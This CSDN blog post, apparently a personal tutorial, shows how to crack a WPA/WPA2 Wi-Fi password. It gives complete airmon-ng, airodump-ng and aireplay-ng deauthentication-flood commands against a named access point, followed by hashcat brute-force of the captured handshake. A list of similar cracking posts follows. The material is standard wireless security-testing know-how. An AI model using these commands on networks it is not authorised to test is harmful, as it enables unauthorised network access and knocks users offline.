Kali Aircrack-NG HashCat 破解Wi-Fi密码

已于 2022-05-18 14:46:42 修改
阅读量5.2k 收藏 53
点赞数 6
文章标签: 安全 linux 网络
于 2022-05-18 14:45:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/VOLTAGE3412/article/details/124841979
版权

Kali Aircrack-NG HashCat 破解Wi-Fi密码

假日无事,某网站购入TL-WN722N Kali免驱网卡,扫描一下附近网络试试
仅学习使用

1.设备概要

2.破解WPA/WPA2类WI-FI操作(Root下操作):

用Parallels Desktop 安装Kali Linux,并且接入无线网卡

2.1查看可用无线网卡

airmon-ng

在这里插入图片描述

2.2启用网卡监听模式

airmon-ng start wlan0

使用iwconfig确认已经开启网卡监听模式,主要表现是,网卡名称wlan0变为wlan0mon, Mode:Monitor

在这里插入图片描述

2.3扫描周围Wi-Fi

airodump-ng wlan0mon

BSSID -- Wi-Fi的Mac地址 PWR -- 信号强度 Data -- 监听期间流量总和 CH -- WI-FI所用信道 ENC -- 加密算法 ESSID -- Wi-Fi名称

  • 看到需要破解的WI-FI按下Ctrl +C 终止
    我们的目标名是 ChinaNet-zLAp BSSID : 8C:53:C3:DA:77:F7 CH : 6

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-EGjssNUT-1652855895563)(https://s3-us-west-2.amazonaws.com/secure.notion-static.com/a16223c7-251a-4e00-9911-e0ff3d6cb24b/Untitled.png)]

2.4抓取握手包并保存为CAP文件

airodump-ng --bssid 8C:53:C3:DA:77:F7 -c 6 -w /root/ChinaNet-zLAp wlan0mon
# -bssid 指定要破解的WI-FI BSSID 值
# -c 指定要破解的Wi-Fi的信道
# -w 捕获到的握手包文件名

在这里插入图片描述

2.5 主动对设备断网获取握手包

上一步中我们是被动等待
(以前我没有kali linux以及网卡的时候,MacBook就一直挂着等待很久很久~~)

但对于上面已经连上Wi-Fi的设备,我们可以使用aireplay-ng 进行deauth洪水攻击使其设备掉线,掉线的设备会自动重新连上Wi-Fi,此时我们就可以获得握手包

保持上步抓包命令不中断,新开一个窗口执行(我们选取信号最好的 PWR = -12 ):

aireplay-ng -0 10 -a 8C:53:C3:DA:77:F7 -c 28:6C:07:29:D9:A2 wlan0mon
# -0 表示断开设备连接
# 10 表示deauth攻击次数
# -a 为Wi-Fi的BSSID
# -c 表示让连接设备失效的设备BSSID地址,为上图中STATION地址

在这里插入图片描述

上图为洪水攻击过程(攻击过程十分明显,因为我连网的智能台灯熄灭重启了)

如图所示,我们已经抓到了重新认证的 28:6C:07:29:D9:A2 的握手包,使用Ctrl +C终止抓包

在这里插入图片描述

此时会在指定目录下产生文件(每次抓包后会产生一组,留意数字为第几次执行的)

在这里插入图片描述

3.暴力破解CAP文件

字典配合Aircrack-ng效率有点低(CPU破解),所以我们使用HashCat(GPU)破解WPA/WPA2的握手包

由于HashCat无法直接破解CAP文件,所以我们得将其转化为HCCAPX文件

去官网转换,https://hashcat.net/cap2hccapx/ 如图

在这里插入图片描述

或者使用工具(hashcat-utils的cap2hccapx):

下载地址:https://github.com/hashcat/hashcat-utils/releases/

cd hashcat-utils-1.9/bin && chmod +x cap2hccapx.bin

将CAP文件转化为HCCAPX文件:

在这里插入图片描述

  • 因为抓包了好几次,所以这里出现3个,只要有其中的一个就可以了,如果没有,那就是抓包失败了

3.1使用HashCat破解

  • 找了一台有独显的笔记本,MacBook核显计算??..
hashcat -a 3 -m 2500 ChinaNet-zLAp-01.hccapx "?d?d?d?d?d?d?d?d?d?d"
# -a attack_mode [ 0 Straight(字典破解) 1 Combination(组合破解) 3 Brute-force(掩码暴力破解)]
# -m 2500 破解WPA2 hccapx文件
#'?d' 一个'?d'表示一个数字,我这里是10位数数字密码,常用掩码类型如下:
# ? | Charset
#  ===+=========
#   l | abcdefghijklmnopqrstuvwxyz
#   u | ABCDEFGHIJKLMNOPQRSTUVWXYZ
#   d | 0123456789
#   h | 0123456789abcdef
#   H | 0123456789ABCDEF
#   s |  !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
#   a | ?l?u?d?s

按下**’s’**了解最新破解信息(Wi-Fi是10位数数字密码,GTX 850M 最久需要两天。。)

在这里插入图片描述
过了很久,密码破解成功,如图:
在这里插入图片描述

ztfot
关注
  • 6
    点赞
  • 53
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【嗅探工具】无线WIFI密码破解
孤桜懶契
06-22 1万+
前言 本文仅介绍通过抓取握手包的方式破解WPA/WPA2的密码,用到的工具是Kali Linux自带的airmon-ng,以及地表最强密码破解工具hashcat(可选)。 Aircrack-ng破解wifi使用的几个套件 aircrack-ng 破解WEP以及WPA(字典攻击)密钥 airdecap-ng 通过已知密钥来解密WEP或WPA嗅探数据 airmon-ng 将网卡设定为监听模式 aireplay-ng 数据包注入工具 airodump-ng 数据包嗅探:将无线网络数据
kali linux下 hachcat安装
weixin_33700350的博客
02-20 2215
网上关于hachcat的简单使用方法介绍很多,然而却很少有在kali linux上的安装教程,找了好长时间,终于安装成功了,特此将中间借鉴的内容记录如下: #首先安装p7z,用于解压下载的p7z包 #然后安装hashcat Lets Begin the journey of Cracking Passwords….. Download Hashcat: Download the late...
关于利用hashcat破解WiFi数据包的操作记录
最新发布
lm19770429的专栏
06-06 1051
hashcat
hashcat破解wifi密码kali
博客
01-10 2万+
第一步 将网卡处于监听状态 airmon-ng check airmon-ng check kill // 关闭影响监听状态的进程 airmon-ng start wlan0 第二步 扫描可用wifi airodump-ng wlan0mon 第三部 获取wifi的握手包 airodump-ng -c (上一步扫描的CH) --bssid (想要破解wifi的ssid) -w ...
Kali-WIFI攻防(七)----WPA密码破解Hashcat
fendo
04-07 2万+
一、工具简介 Hashcat系列软件是比较牛逼的密码破解软件,HashCat主要分为三个版本:Hashcat、oclHashcat-plus、oclHashcat-lite。这三个版本的主要区别是:HashCat只支持CPU破解。oclHashcat-plus支持使用GPU破解多个HASH,并且支持的算法高达77种, oclHashcat-lite只支持使用GPU对单个HASH进行破解
Hashcat每秒计算1.4亿个密码破解隔壁WiFi
dexi113的博客
06-12 1459
使用aircrac-ng破解密码的时候计算机会爆卡, 内存占用100%是常事, 使用Hashcat破解的时候计算机一点都不卡, Hashcat不但支持CPU破解,还支持GPU破解,利用显卡的计算能力进行极速破解,简直666。即使使用普通的CPU或GPU,每秒也能够生成1.35亿个哈希值, 我这台电脑是Mac Air,破解8位数字需要随机组合。个数字, 这个是千万级别的数字, 使用Hashcat破解只需要1小时40分钟, 平均一秒钟计算1.4个亿密码。抓到的 4 次握手文件转换为hccap的格式。
破解WPA/WPA2 WiFi密码 // 使用 Kali Linux & Aircrack-ng & Hashcat
ROSEBUD7_K的博客
07-31 764
使用Kali 破解WiFi全过程。
aircrack-ng-1.2-beta1.tar.gz
08-21
Aircrack-ng is a complete suite of tools to assess WiFi network security. It focuses on different areas of WiFi security: Monitoring: Packet capture and export of data to text files for further ...
aircrack-ng-1.2-rc4.tar.gz WINDOWS版本
08-05
Aircrack-ng是一个与802.11标准的无线网络分析有关的安全软件,主要功能有:网络侦测,...使用 Aircrack-ng 破解 WEP 和 WPA/WPA2 加密的 Wi-Fi 密码,这个是在windows下运行的,功能和使用方法与在kali上运行相同
kali linux 无线攻击——aircrack-ng-附件资源
03-05
kali linux 无线攻击——aircrack-ng-附件资源
hashcat的一点密码破解的心得(转载)
03-04
hashcat的命令行详解,真正高手必备。
Hashcat 破解 wifi WPA2 PMKID
mixboot
03-24 5838
Hashcat 破解 wifi1,系统环境2,环境搭建 1,系统环境 $ cat /etc/issue Ubuntu 18.04.2 LTS \n \l 2,环境搭建 安装hashcat $ apt-cache search hashcat # apt install -y hashcat # apt install -y git # git clone https://github.com...
aircrack&_hashcat非字典高速破解目标无线密码
测试
06-28 3297
目录 aircrack & hashcat 非字典高速破解目标无线密码 aircrack & hashcat 非字典高速破解目标无线密码 0x01 挂载好外置无线网卡 ​ 把用于抓包的无线网卡挂到kali中,正常情况下,网卡在成功载入系统后,应该...
kali-进行抓包以及aircrack-ng跑包和hashcat跑包
乌托托的博客
12-17 5788
使用kali进行抓包以及aircrack-ng跑包和hashcat跑包
最新kalihashcat
vanony的博客
01-21 3904
描述:   基于CPU的高级密码恢复实用程序。   Hashcat是世界上最快的基于CPU的密码恢复工具。   尽管它的速度不及其GPU同类产品oclHashcat,但通过良好的字典和对命令开关的一点了解,可以轻松地将大型列表一分为二。   Hashcat是自称为世界上最快的基于CPU的密码恢复工具。受hashcat支持的哈希算法包括Microsoft LM Hashes,MD4,MD5,SHA系列,Unix Crypt格式,MySQL,Cisco PIX。 选项: -h,--help 显示选项摘要信息。
Kali——密码攻击——Hashcat工具使用
qq_63167128的博客
03-07 2742
介绍:本文展示了密码存储原理及通过Kali使用Hashcat工具进行密码攻击的流程(也可以在windows系统中下载metasploit工具进行相关操作),工具详细教程可在Sangfor学习平台获取临时免费课程进行学习。
Hashcat的使用手册总结
热门推荐
时光途径
05-10 3万+
简介 Hashcat是自称世界上最快的密码恢复工具。它在2015年之前拥有专有代码库,但现在作为免费软件发布。适用于Linux,OS X和Windows的版本可以使用基于CPU或基于GPU的变体。支持hashcat的散列算法有Microsoft LM哈希,MD4,MD5,SHA系列,Unix加密格式,MySQL和Cisco PIX等。 hashcat支持多种计算核心: GPU CPU AP...
kali aircrack-ng
09-08
Kali Linux是一个基于Debian的Linux发行版,被广泛用于网络安全测试和渗透测试。而Aircrack-ng是一款用于无线网络渗透测试的工具集,可以用来分析和破解无线网络的加密。在Kali Linux中,Aircrack-ng是预装的工具之一。 你想了解关于Kali LinuxAircrack-ng的哪方面内容?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值